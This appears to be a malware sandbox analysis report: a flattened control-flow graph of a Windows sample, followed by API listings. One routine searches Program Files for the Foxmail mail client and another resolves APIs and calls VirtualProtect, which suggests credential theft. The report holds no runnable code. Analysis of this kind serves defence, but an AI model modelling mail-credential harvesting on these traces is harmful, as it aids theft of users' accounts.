7304 23dc96c2 7305 23dc96c7 7304->7305 7306 23dc5af6 _abort 38 API calls 7304->7306 7305->7265 7305->7266 7307 23dc96ea 7306->7307 7307->7305 7308 23dc9708 GetConsoleMode 7307->7308 7308->7305 7312 23dc969f 7309->7312 7313 23dc966a 7309->7313 7310 23dc96a1 GetLastError 7310->7312 7311 23dca181 WriteConsoleW CreateFileW 7311->7313 7312->7284 7313->7310 7313->7311 7313->7312 7319 23dc94f5 7314->7319 7324 23dc9607 7314->7324 7315 23dc2ada _ValidateLocalCookies 5 API calls 7316 23dc9641 7315->7316 7316->7284 7318 23dc79e6 40 API calls __fassign 7318->7319 7319->7318 7320 23dc957b WideCharToMultiByte 7319->7320 7323 23dc95d2 WriteFile 7319->7323 7319->7324 7383 23dc7c19 7319->7383 7321 23dc95a1 WriteFile 7320->7321 7320->7324 7321->7319 7322 23dc962a GetLastError 7321->7322 7322->7324 7323->7319 7323->7322 7324->7315 7330 23dc9816 7325->7330 7326 23dc98d8 7327 23dc2ada _ValidateLocalCookies 5 API calls 7326->7327 7331 23dc98f1 7327->7331 7328 23dc9894 WriteFile 7329 23dc98da GetLastError 7328->7329 7328->7330 7329->7326 7330->7326 7330->7328 7331->7284 7339 23dc9904 7332->7339 7333 23dc9a0f 7334 23dc2ada _ValidateLocalCookies 5 API calls 7333->7334 7335 23dc9a1e 7334->7335 7335->7284 7336 23dc9986 WideCharToMultiByte 7337 23dc99bb WriteFile 7336->7337 7338 23dc9a07 GetLastError 7336->7338 7337->7338 7337->7339 7338->7333 7339->7333 7339->7336 7339->7337 7342 23dc9737 7340->7342 7341 23dc97ea 7343 23dc2ada _ValidateLocalCookies 5 API calls 7341->7343 7342->7341 7344 23dc97a9 WriteFile 7342->7344 7345 23dc9803 7343->7345 7344->7342 7346 23dc97ec GetLastError 7344->7346 7345->7284 7346->7341 7348 23dc6355 __dosmaperr 20 API calls 7347->7348 7349 23dc633d __dosmaperr 7348->7349 7350 23dc6368 __dosmaperr 20 API calls 7349->7350 7351 23dc6350 7350->7351 7351->7282 7361 23dc8d52 7352->7361 7354 23dc9f9f 7355 23dc9fb8 SetFilePointerEx 7354->7355 7356 23dc9fa7 7354->7356 7358 23dc9fac 7355->7358 7359 23dc9fd0 GetLastError 7355->7359 7357 23dc6368 __dosmaperr 20 API calls 7356->7357 7357->7358 7358->7256 7360 23dc6332 __dosmaperr 20 API calls 7359->7360 7360->7358 7362 23dc8d5f 7361->7362 7363 23dc8d74 7361->7363 7364 23dc6355 __dosmaperr 20 API calls 7362->7364 7366 23dc6355 __dosmaperr 20 API calls 7363->7366 7369 23dc8d99 7363->7369 7365 23dc8d64 7364->7365 7368 23dc6368 __dosmaperr 20 API calls 7365->7368 7367 23dc8da4 7366->7367 7370 23dc6368 __dosmaperr 20 API calls 7367->7370 7371 23dc8d6c 7368->7371 7369->7354 7372 23dc8dac 7370->7372 7371->7354 7373 23dc62ac _abort 26 API calls 7372->7373 7373->7371 7375 23dc8dc9 7374->7375 7376 23dc8dd6 7374->7376 7377 23dc6368 __dosmaperr 20 API calls 7375->7377 7378 23dc8de2 7376->7378 7379 23dc6368 __dosmaperr 20 API calls 7376->7379 7380 23dc8dce 7377->7380 7378->7304 7381 23dc8e03 7379->7381 7380->7304 7382 23dc62ac _abort 26 API calls 7381->7382 7382->7380 7384 23dc5af6 _abort 38 API calls 7383->7384 7385 23dc7c24 7384->7385 7386 23dc7a00 __fassign 38 API calls 7385->7386 7387 23dc7c34 7386->7387 7387->7319 7388->7298 7392 23dcad24 7389->7392 7391 23dcadca 7391->7214 7393 23dcad30 ___scrt_is_nonwritable_in_current_image 7392->7393 7403 23dc8c7b RtlEnterCriticalSection 7393->7403 7395 23dcad3e 7396 23dcad65 7395->7396 7397 23dcad70 7395->7397 7404 23dcae4d 7396->7404 7399 23dc6368 __dosmaperr 20 API calls 7397->7399 7400 23dcad6b 7399->7400 7419 23dcad9a 7400->7419 7402 23dcad8d _abort 7402->7391 7403->7395 7405 23dc8d52 26 API calls 7404->7405 7408 23dcae5d 7405->7408 7406 23dcae63 7422 23dc8cc1 7406->7422 7408->7406 7409 23dcae95 7408->7409 7411 23dc8d52 26 API calls 7408->7411 7409->7406 7412 23dc8d52 26 API calls 7409->7412 7414 23dcae8c 7411->7414 7415 23dcaea1 CloseHandle 7412->7415 7413 23dcaedd 7413->7400 7418 23dc8d52 26 API calls 7414->7418 7415->7406 7416 23dcaead GetLastError 7415->7416 7416->7406 7417 23dc6332 __dosmaperr 20 API calls 7417->7413 7418->7409 7431 23dc8c9e RtlLeaveCriticalSection 7419->7431 7421 23dcada4 7421->7402 7423 23dc8d37 7422->7423 7424 23dc8cd0 7422->7424 7425 23dc6368 __dosmaperr 20 API calls 7423->7425 7424->7423 7430 23dc8cfa 7424->7430 7426 23dc8d3c 7425->7426 7427 23dc6355 __dosmaperr 20 API calls 7426->7427 7428 23dc8d27 7427->7428 7428->7413 7428->7417 7429 23dc8d21 SetStdHandle 7429->7428 7430->7428 7430->7429 7431->7421 7432->7187 7433->7167 7842 23dc8a89 7843 23dc6d60 51 API calls 7842->7843 7844 23dc8a8e 7843->7844 7885 23dc2049 7886 23dc2055 ___scrt_is_nonwritable_in_current_image 7885->7886 7887 23dc207d 7886->7887 7888 23dc20d3 7886->7888 7898 23dc205e 7886->7898 7899 23dc244c 7887->7899 7889 23dc2639 ___scrt_fastfail 4 API calls 7888->7889 7891 23dc20da 7889->7891 7892 23dc2082 7908 23dc2308 7892->7908 7894 23dc2087 __RTC_Initialize 7911 23dc20c4 7894->7911 7896 23dc209f 7914 23dc260b 7896->7914 7900 23dc2451 ___scrt_release_startup_lock 7899->7900 7901 23dc2455 7900->7901 7905 23dc2461 7900->7905 7902 23dc527a _abort 20 API calls 7901->7902 7903 23dc245f 7902->7903 7903->7892 7904 23dc246e 7904->7892 7905->7904 7906 23dc499b _abort 28 API calls 7905->7906 7907 23dc4bbd 7906->7907 7907->7892 7920 23dc34c7 RtlInterlockedFlushSList 7908->7920 7910 23dc2312 7910->7894 7922 23dc246f 7911->7922 7913 23dc20c9 ___scrt_release_startup_lock 7913->7896 7915 23dc2617 7914->7915 7919 23dc262d 7915->7919 7930 23dc53ed 7915->7930 7918 23dc3529 ___vcrt_uninitialize 8 API calls 7918->7919 7919->7898 7921 23dc34d7 7920->7921 7921->7910 7927 23dc53ff 7922->7927 7925 23dc391b ___vcrt_uninitialize_ptd 6 API calls 7926 23dc354d 7925->7926 7926->7913 7928 23dc5c2b 11 API calls 7927->7928 7929 23dc2476 7928->7929 7929->7925 7933 23dc74da 7930->7933 7934 23dc74f3 7933->7934 7935 23dc2ada _ValidateLocalCookies 5 API calls 7934->7935 7936 23dc2625 7935->7936 7936->7918 7434 23dca945 7436 23dca96d 7434->7436 7435 23dca9a5 7436->7435 7437 23dca99e 7436->7437 7438 23dca997 7436->7438 7447 23dcaa00 7437->7447 7443 23dcaa17 7438->7443 7444 23dcaa20 7443->7444 7451 23dcb19b 7444->7451 7448 23dcaa20 7447->7448 7449 23dcb19b __startOneArgErrorHandling 21 API calls 7448->7449 7450 23dca9a3 7449->7450 7452 23dcb1da __startOneArgErrorHandling 7451->7452 7457 23dcb25c __startOneArgErrorHandling 7452->7457 7461 23dcb59e 7452->7461 7454 23dcb286 7456 23dcb292 7454->7456 7468 23dcb8b2 7454->7468 7459 23dc2ada _ValidateLocalCookies 5 API calls 7456->7459 7457->7454 7464 23dc78a3 7457->7464 7460 23dca99c 7459->7460 7475 23dcb5c1 7461->7475 7465 23dc78cb 7464->7465 7466 23dc2ada _ValidateLocalCookies 5 API calls 7465->7466 7467 23dc78e8 7466->7467 7467->7454 7469 23dcb8d4 7468->7469 7471 23dcb8bf 7468->7471 7472 23dc6368 __dosmaperr 20 API calls 7469->7472 7470 23dcb8d9 7470->7456 7471->7470 7473 23dc6368 __dosmaperr 20 API calls 7471->7473 7472->7470 7474 23dcb8cc 7473->7474 7474->7456 7476 23dcb5ec __raise_exc 7475->7476 7477 23dcb7e5 RaiseException 7476->7477 7478 23dcb5bc 7477->7478 7478->7457 6885 23dca1c6 IsProcessorFeaturePresent 6886 23dc7bc7 6887 23dc7bd3 ___scrt_is_nonwritable_in_current_image 6886->6887 6888 23dc7c0a _abort 6887->6888 6894 23dc5671 RtlEnterCriticalSection 6887->6894 6890 23dc7be7 6891 23dc7f86 __fassign 20 API calls 6890->6891 6892 23dc7bf7 6891->6892 6895 23dc7c10 6892->6895 6894->6890 6898 23dc56b9 RtlLeaveCriticalSection 6895->6898 6897 23dc7c17 6897->6888 6898->6897 7849 23dc7a80 7850 23dc7a8d 7849->7850 7851 23dc637b _abort 20 API calls 7850->7851 7852 23dc7aa7 7851->7852 7853 23dc571e _free 20 API calls 7852->7853 7854 23dc7ab3 7853->7854 7855 23dc637b _abort 20 API calls 7854->7855 7859 23dc7ad9 7854->7859 7856 23dc7acd 7855->7856 7858 23dc571e _free 20 API calls 7856->7858 7857 23dc5eb7 11 API calls 7857->7859 7858->7859 7859->7857 7860 23dc7ae5 7859->7860 7937 23dc8640 7940 23dc8657 7937->7940 7941 23dc8679 7940->7941 7942 23dc8665 7940->7942 7944 23dc8681 7941->7944 7945 23dc8693 7941->7945 7943 23dc6368 __dosmaperr 20 API calls 7942->7943 7946 23dc866a 7943->7946 7947 23dc6368 __dosmaperr 20 API calls 7944->7947 7950 23dc54a7 __fassign 38 API calls 7945->7950 7952 23dc8652 7945->7952 7948 23dc62ac _abort 26 API calls 7946->7948 7949 23dc8686 7947->7949 7948->7952 7951 23dc62ac _abort 26 API calls 7949->7951 7950->7952 7951->7952 7479 23dcaf43 7480 23dcaf4d 7479->7480 7481 23dcaf59 7479->7481 7480->7481 7482 23dcaf52 CloseHandle 7480->7482 7482->7481 7511 23dc5303 7514 23dc50a5 7511->7514 7523 23dc502f 7514->7523 7517 23dc502f 5 API calls 7518 23dc50c3 7517->7518 7527 23dc5000 7518->7527 7521 23dc5000 20 API calls 7522 23dc50d9 7521->7522 7524 23dc5048 7523->7524 7525 23dc2ada _ValidateLocalCookies 5 API calls 7524->7525 7526 23dc5069 7525->7526 7526->7517 7528 23dc500d 7527->7528 7532 23dc502a 7527->7532 7529 23dc5024 7528->7529 7531 23dc571e _free 20 API calls 7528->7531 7530 23dc571e _free 20 API calls 7529->7530 7530->7532 7531->7528 7532->7521 7533 23dc7103 GetCommandLineA GetCommandLineW 8021 23dc543d 8022 23dc5440 8021->8022 8023 23dc55a8 _abort 38 API calls 8022->8023 8024 23dc544c 8023->8024 6899 23dc5bff 6907 23dc5d5c 6899->6907 6902 23dc5c13 6903 23dc5b7a _abort 20 API calls 6904 23dc5c1b 6903->6904 6905 23dc5c28 6904->6905 6914 23dc5c2b 6904->6914 6908 23dc5c45 _abort 5 API calls 6907->6908 6909 23dc5d83 6908->6909 6910 23dc5d9b TlsAlloc 6909->6910 6911 23dc5d8c 6909->6911 6910->6911 6912 23dc2ada _ValidateLocalCookies 5 API calls 6911->6912 6913 23dc5c09 6912->6913 6913->6902 6913->6903 6915 23dc5c35 6914->6915 6916 23dc5c3b 6914->6916 6918 23dc5db2 6915->6918 6916->6902 6919 23dc5c45 _abort 5 API calls 6918->6919 6920 23dc5dd9 6919->6920 6921 23dc5df1 TlsFree 6920->6921 6922 23dc5de5 6920->6922 6921->6922 6923 23dc2ada _ValidateLocalCookies 5 API calls 6922->6923 6924 23dc5e02 6923->6924 6924->6916 6988 23dc67bf 6993 23dc67f4 6988->6993 6991 23dc67db 6992 23dc571e _free 20 API calls 6992->6991 6994 23dc6806 6993->6994 6995 23dc67cd 6993->6995 6996 23dc680b 6994->6996 6997 23dc6836 6994->6997 6995->6991 6995->6992 6998 23dc637b _abort 20 API calls 6996->6998 6997->6995 7004 23dc71d6 6997->7004 7000 23dc6814 6998->7000 7002 23dc571e _free 20 API calls 7000->7002 7001 23dc6851 7003 23dc571e _free 20 API calls 7001->7003 7002->6995 7003->6995 7005 23dc71e1 7004->7005 7006 23dc7209 7005->7006 7007 23dc71fa 7005->7007 7008 23dc7218 7006->7008 7013 23dc8a98 7006->7013 7010 23dc6368 __dosmaperr 20 API calls 7007->7010 7020 23dc8acb 7008->7020 7012 23dc71ff ___scrt_fastfail 7010->7012 7012->7001 7014 23dc8ab8 RtlSizeHeap 7013->7014 7015 23dc8aa3 7013->7015 7014->7008 7016 23dc6368 __dosmaperr 20 API calls 7015->7016 7017 23dc8aa8 7016->7017 7018 23dc62ac _abort 26 API calls 7017->7018 7019 23dc8ab3 7018->7019 7019->7008 7021 23dc8ad8 7020->7021 7022 23dc8ae3 7020->7022 7024 23dc56d0 21 API calls 7021->7024 7023 23dc8aeb 7022->7023 7030 23dc8af4 _abort 7022->7030 7025 23dc571e _free 20 API calls 7023->7025 7028 23dc8ae0 7024->7028 7025->7028 7026 23dc8b1e RtlReAllocateHeap 7026->7028 7026->7030 7027 23dc8af9 7029 23dc6368 __dosmaperr 20 API calls 7027->7029 7028->7012 7029->7028 7030->7026 7030->7027 7031 23dc474f _abort 7 API calls 7030->7031 7031->7030 7534 23dc1f3f 7535 23dc1f4b ___scrt_is_nonwritable_in_current_image 7534->7535 7552 23dc247c 7535->7552 7537 23dc1f52 7538 23dc1f7c 7537->7538 7539 23dc2041 7537->7539 7546 23dc1f57 ___scrt_is_nonwritable_in_current_image 7537->7546 7563 23dc23de 7538->7563 7575 23dc2639 IsProcessorFeaturePresent 7539->7575 7542 23dc2048 7543 23dc1f8b __RTC_Initialize 7543->7546 7566 23dc22fc RtlInitializeSListHead 7543->7566 7545 23dc1f99 ___scrt_initialize_default_local_stdio_options 7567 23dc46c5 7545->7567 7550 23dc1fb8 7550->7546 7551 23dc4669 _abort 5 API calls 7550->7551 7551->7546 7553 23dc2485 7552->7553 7579 23dc2933 IsProcessorFeaturePresent 7553->7579 7557 23dc2496 7562 23dc249a 7557->7562 7590 23dc53c8 7557->7590 7560 23dc24b1 7560->7537 7561 23dc3529 ___vcrt_uninitialize 8 API calls 7561->7562 7562->7537 7626 23dc24b5 7563->7626 7565 23dc23e5 7565->7543 7566->7545 7568 23dc46dc 7567->7568 7569 23dc2ada _ValidateLocalCookies 5 API calls 7568->7569 7570 23dc1fad 7569->7570 7570->7546 7571 23dc23b3 7570->7571 7572 23dc23b8 ___scrt_release_startup_lock 7571->7572 7573 23dc2933 ___isa_available_init IsProcessorFeaturePresent 7572->7573 7574 23dc23c1 7572->7574 7573->7574 7574->7550 7576 23dc264e ___scrt_fastfail 7575->7576 7577 23dc26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7576->7577 7578 23dc2744 ___scrt_fastfail 7577->7578 7578->7542 7580 23dc2491 7579->7580 7581 23dc34ea 7580->7581 7582 23dc34ef ___vcrt_initialize_winapi_thunks 7581->7582 7593 23dc3936 7582->7593 7585 23dc34fd 7585->7557 7587 23dc3505 7588 23dc3510 7587->7588 7589 23dc3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7587->7589 7588->7557 7589->7585 7622 23dc7457 7590->7622 7594 23dc393f 7593->7594 7596 23dc3968 7594->7596 7597 23dc34f9 7594->7597 7607 23dc3be0 7594->7607 7598 23dc3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7596->7598 7597->7585 7599 23dc38e8 7597->7599 7598->7597 7612 23dc3af1 7599->7612 7602 23dc38fd 7602->7587 7605 23dc3918 7605->7587 7606 23dc391b ___vcrt_uninitialize_ptd 6 API calls 7606->7602 7608 23dc3a82 try_get_function 5 API calls 7607->7608 7609 23dc3bfa 7608->7609 7610 23dc3c18 InitializeCriticalSectionAndSpinCount 7609->7610 7611 23dc3c03 7609->7611 7610->7611 7611->7594 7613 23dc3a82 try_get_function 5 API calls 7612->7613 7614 23dc3b0b 7613->7614 7615 23dc3b24 TlsAlloc 7614->7615 7616 23dc38f2 7614->7616 7616->7602 7617 23dc3ba2 7616->7617 7618 23dc3a82 try_get_function 5 API calls 7617->7618 7619 23dc3bbc 7618->7619 7620 23dc3bd7 TlsSetValue 7619->7620 7621 23dc390b 7619->7621 7620->7621 7621->7605 7621->7606 7625 23dc7470 7622->7625 7623 23dc2ada _ValidateLocalCookies 5 API calls 7624 23dc24a3 7623->7624 7624->7560 7624->7561 7625->7623 7627 23dc24c8 7626->7627 7628 23dc24c4 7626->7628 7629 23dc2639 ___scrt_fastfail 4 API calls 7627->7629 7631 23dc24d5 ___scrt_release_startup_lock 7627->7631 7628->7565 7630 23dc2559 7629->7630 7631->7565 6925 23dc63f0 6926 23dc6400 6925->6926 6933 23dc6416 6925->6933 6927 23dc6368 __dosmaperr 20 API calls 6926->6927 6928 23dc6405 6927->6928 6929 23dc62ac _abort 26 API calls 6928->6929 6931 23dc640f 6929->6931 6930 23dc4e76 20 API calls 6937 23dc64e5 6930->6937 6932 23dc6480 6932->6930 6932->6932 6933->6932 6938 23dc6561 6933->6938 6944 23dc6580 6933->6944 6935 23dc64ee 6936 23dc571e _free 20 API calls 6935->6936 6936->6938 6937->6935 6941 23dc6573 6937->6941 6955 23dc85eb 6937->6955 6964 23dc679a 6938->6964 6942 23dc62bc _abort 11 API calls 6941->6942 6943 23dc657f 6942->6943 6945 23dc658c 6944->6945 6945->6945 6946 23dc637b _abort 20 API calls 6945->6946 6947 23dc65ba 6946->6947 6948 23dc85eb 26 API calls 6947->6948 6949 23dc65e6 6948->6949 6950 23dc62bc _abort 11 API calls 6949->6950 6951 23dc6615 ___scrt_fastfail 6950->6951 6952 23dc66b6 FindFirstFileExA 6951->6952 6953 23dc6705 6952->6953 6954 23dc6580 26 API calls 6953->6954 6957 23dc853a 6955->6957 6956 23dc854f 6958 23dc6368 __dosmaperr 20 API calls 6956->6958 6959 23dc8554 6956->6959 6957->6956 6957->6959 6961 23dc858b 6957->6961 6963 23dc857a 6958->6963 6959->6937 6960 23dc62ac _abort 26 API calls 6960->6959 6961->6959 6962 23dc6368 __dosmaperr 20 API calls 6961->6962 6962->6963 6963->6960 6968 23dc67a4 6964->6968 6965 23dc67b4 6967 23dc571e _free 20 API calls 6965->6967 6966 23dc571e _free 20 API calls 6966->6968 6969 23dc67bb 6967->6969 6968->6965 6968->6966 6969->6931 7483 23dc3370 7494 23dc3330 7483->7494 7495 23dc334f 7494->7495 7496 23dc3342 7494->7496 7497 23dc2ada _ValidateLocalCookies 5 API calls 7496->7497 7497->7495 8025 23dc5630 8026 23dc563b 8025->8026 8027 23dc5eb7 11 API calls 8026->8027 8028 23dc5664 8026->8028 8029 23dc5660 8026->8029 8027->8026 8031 23dc5688 8028->8031 8032 23dc56b4 8031->8032 8033 23dc5695 8031->8033 8032->8029 8034 23dc569f RtlDeleteCriticalSection 8033->8034 8034->8032 8034->8034 7953 23dc9e71 7954 23dc9e95 7953->7954 7955 23dcac6b __startOneArgErrorHandling 7954->7955 7957 23dc9eae 7954->7957 7960 23dcacad __startOneArgErrorHandling 7955->7960 7961 23dcb2f0 7955->7961 7956 23dc9ef8 7957->7956 7958 23dcaa53 21 API calls 7957->7958 7958->7956 7962 23dcb329 __startOneArgErrorHandling 7961->7962 7963 23dcb5c1 __raise_exc RaiseException 7962->7963 7964 23dcb350 __startOneArgErrorHandling 7962->7964 7963->7964 7965 23dcb393 7964->7965 7966 23dcb36e 7964->7966 7967 23dcb8b2 __startOneArgErrorHandling 20 API calls 7965->7967 7972 23dcb8e1 7966->7972 7969 23dcb38e __startOneArgErrorHandling 7967->7969 7970 23dc2ada _ValidateLocalCookies 5 API calls 7969->7970 7971 23dcb3b7 7970->7971 7971->7960 7973 23dcb8f0 7972->7973 7974 23dcb90f __startOneArgErrorHandling 7973->7974 7975 23dcb964 __startOneArgErrorHandling 7973->7975 7976 23dc78a3 __startOneArgErrorHandling 5 API calls 7974->7976 7977 23dcb8b2 __startOneArgErrorHandling 20 API calls 7975->7977 7978 23dcb950 7976->7978 7980 23dcb95d 7977->7980 7979 23dcb8b2 __startOneArgErrorHandling 20 API calls 7978->7979 7978->7980 7979->7980 7980->7969 7865 23dc3eb3 7866 23dc5411 38 API calls 7865->7866 7867 23dc3ebb 7866->7867 7868 23dc60ac 7869 23dc60dd 7868->7869 7870 23dc60b7 7868->7870 7870->7869 7871 23dc60c7 FreeLibrary 7870->7871 7871->7870 7981 23dc506f 7982 23dc5081 7981->7982 7984 23dc5087 7981->7984 7983 23dc5000 20 API calls 7982->7983 7983->7984 7985 23dcac6b 7986 23dcac84 __startOneArgErrorHandling 7985->7986 7987 23dcb2f0 21 API calls 7986->7987 7988 23dcacad __startOneArgErrorHandling 7986->7988 7987->7988 8035 23dc742b 8036 23dc7430 8035->8036 8037 23dc7453 8036->8037 8039 23dc8bae 8036->8039 8040 23dc8bbb 8039->8040 8041 23dc8bdd 8039->8041 8042 23dc8bc9 RtlDeleteCriticalSection 8040->8042 8043 23dc8bd7 8040->8043 8041->8036 8042->8042 8042->8043 8044 23dc571e _free 20 API calls 8043->8044 8044->8041 6238 23dcc7a7 6239 23dcc7be 6238->6239 6244 23dcc82c 6238->6244 6239->6244 6250 23dcc7e6 GetModuleHandleA 6239->6250 6241 23dcc835 GetModuleHandleA 6243 23dcc83f 6241->6243 6242 23dcc872 6243->6243 6243->6244 6246 23dcc85f GetProcAddress 6243->6246 6244->6241 6244->6242 6244->6243 6245 23dcc7dd 6245->6243 6245->6244 6247 23dcc800 GetProcAddress 6245->6247 6246->6244 6247->6244 6248 23dcc80d VirtualProtect 6247->6248 6248->6244 6249 23dcc81c VirtualProtect 6248->6249 6249->6244 6251 23dcc7ef 6250->6251 6256 23dcc82c 6250->6256 6262 23dcc803 GetProcAddress 6251->6262 6253 23dcc7f4 6253->6256 6257 23dcc800 GetProcAddress 6253->6257 6254 23dcc835 GetModuleHandleA 6261 23dcc83f 6254->6261 6255 23dcc872 6256->6254 6256->6255 6256->6261 6257->6256 6258 23dcc80d VirtualProtect 6257->6258 6258->6256 6259 23dcc81c VirtualProtect 6258->6259 6259->6256 6260 23dcc85f GetProcAddress 6260->6256 6261->6256 6261->6260 6263 23dcc82c 6262->6263 6264 23dcc80d VirtualProtect 6262->6264 6266 23dcc835 GetModuleHandleA 6263->6266 6267 23dcc872 6263->6267 6264->6263 6265 23dcc81c VirtualProtect 6264->6265 6265->6263 6269 23dcc83f 6266->6269 6268 23dcc85f GetProcAddress 6268->6269 6269->6263 6269->6268 6970 23dca1e0 6973 23dca1fe 6970->6973 6972 23dca1f6 6974 23dca203 6973->6974 6976 23dca298 6974->6976 6978 23dcaa53 6974->6978 6976->6972 6979 23dcaa70 RtlDecodePointer 6978->6979 6980 23dcaa80 6978->6980 6979->6980 6981 23dcab0d 6980->6981 6984 23dcab02 6980->6984 6986 23dcaab7 6980->6986 6981->6984 6985 23dc6368 __dosmaperr 20 API calls 6981->6985 6982 23dc2ada _ValidateLocalCookies 5 API calls 6983 23dca42f 6982->6983 6983->6972 6984->6982 6985->6984 6986->6984 6987 23dc6368 __dosmaperr 20 API calls 6986->6987 6987->6984 7032 23dc81a0 7033 23dc81d9 7032->7033 7034 23dc81dd 7033->7034 7045 23dc8205 7033->7045 7035 23dc6368 __dosmaperr 20 API calls 7034->7035 7036 23dc81e2 7035->7036 7038 23dc62ac _abort 26 API calls 7036->7038 7037 23dc8529 7039 23dc2ada _ValidateLocalCookies 5 API calls 7037->7039 7040 23dc81ed 7038->7040 7041 23dc8536 7039->7041 7042 23dc2ada _ValidateLocalCookies 5 API calls 7040->7042 7044 23dc81f9 7042->7044 7045->7037 7046 23dc80c0 7045->7046 7049 23dc80db 7046->7049 7047 23dc2ada _ValidateLocalCookies 5 API calls 7048 23dc8152 7047->7048 7048->7045 7049->7047 7989 23dc7260 GetStartupInfoW 7990 23dc7318 7989->7990 7991 23dc7286 7989->7991 7991->7990 7992 23dc8be3 27 API calls 7991->7992 7993 23dc72af 7992->7993 7993->7990 7994 23dc72dd GetFileType 7993->7994 7994->7993 7050 23dc21a1 ___scrt_dllmain_exception_filter 7498 23dc9d61 7499 23dc9d81 7498->7499 7502 23dc9db8 7499->7502 7501 23dc9dab 7503 23dc9dbf 7502->7503 7504 23dc9e20 7503->7504 7506 23dc9ddf 7503->7506 7505 23dcaa17 21 API calls 7504->7505 7508 23dca90e 7504->7508 7507 23dc9e6e 7505->7507 7506->7508 7509 23dcaa17 21 API calls 7506->7509 7507->7501 7508->7501 7510 23dca93e 7509->7510 7510->7501

                                    Control-flow Graph

                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23DC1137
                                    • lstrcatW.KERNEL32(?,?), ref: 23DC1151
                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC115C
                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC116D
                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC117C
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23DC1193
                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 23DC11D0
                                    • FindClose.KERNEL32(00000000), ref: 23DC11DB
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                    • String ID:
                                    • API String ID: 1083526818-0
                                    • Opcode ID: 26cca69244d791c238688fd6183c06284aa376915435398f6bf3db967a179d49
                                    • Instruction ID: 338298109007e8c2b4dc866cbd408d6aa1a5b347e4d24a67856e96f4721a5ca1
                                    • Opcode Fuzzy Hash: 26cca69244d791c238688fd6183c06284aa376915435398f6bf3db967a179d49
                                    • Instruction Fuzzy Hash: 7D21F072514359ABC720EB649C48F9B7BDCEF94714F040D2EFA98D3090EB34E61987A6

                                    Control-flow Graph

                                    APIs
                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23DC1434
                                      • Part of subcall function 23DC10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23DC1137
                                      • Part of subcall function 23DC10F1: lstrcatW.KERNEL32(?,?), ref: 23DC1151
                                      • Part of subcall function 23DC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC115C
                                      • Part of subcall function 23DC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC116D
                                      • Part of subcall function 23DC10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23DC117C
                                      • Part of subcall function 23DC10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23DC1193
                                      • Part of subcall function 23DC10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 23DC11D0
                                      • Part of subcall function 23DC10F1: FindClose.KERNEL32(00000000), ref: 23DC11DB
                                    • lstrlenW.KERNEL32(?), ref: 23DC14C5
                                    • lstrlenW.KERNEL32(?), ref: 23DC14E0
                                    • lstrlenW.KERNEL32(?,?), ref: 23DC150F
                                    • lstrcatW.KERNEL32(00000000), ref: 23DC1521
                                    • lstrlenW.KERNEL32(?,?), ref: 23DC1547
                                    • lstrcatW.KERNEL32(00000000), ref: 23DC1553
                                    • lstrlenW.KERNEL32(?,?), ref: 23DC1579
                                    • lstrcatW.KERNEL32(00000000), ref: 23DC1585
                                    • lstrlenW.KERNEL32(?,?), ref: 23DC15AB
                                    • lstrcatW.KERNEL32(00000000), ref: 23DC15B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                    • String ID: )$Foxmail$ProgramFiles
                                    • API String ID: 672098462-2938083778
                                    • Opcode ID: 870427f1ebebd8b83af58e785ed4939cc4be94bb96d7dddae1eac9157d6c4d18
                                    • Instruction ID: a2f29a41fb3d834cb37bb52fdc6b990378ba060d70ca2e01d9a50221f6fc37a3
                                    • Opcode Fuzzy Hash: 870427f1ebebd8b83af58e785ed4939cc4be94bb96d7dddae1eac9157d6c4d18
                                    • Instruction Fuzzy Hash: 3081C572A1036CA9DB30DBA1DC85FEE7379EF45700F0009DAF508E7191EA715A89CBA5

                                    Control-flow Graph

                                    APIs
                                    • GetModuleHandleA.KERNEL32(23DCC7DD), ref: 23DCC7E6
                                    • GetModuleHandleA.KERNEL32(?,23DCC7DD), ref: 23DCC838
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 23DCC860
                                      • Part of subcall function 23DCC803: GetProcAddress.KERNEL32(00000000,23DCC7F4), ref: 23DCC804
                                      • Part of subcall function 23DCC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC816
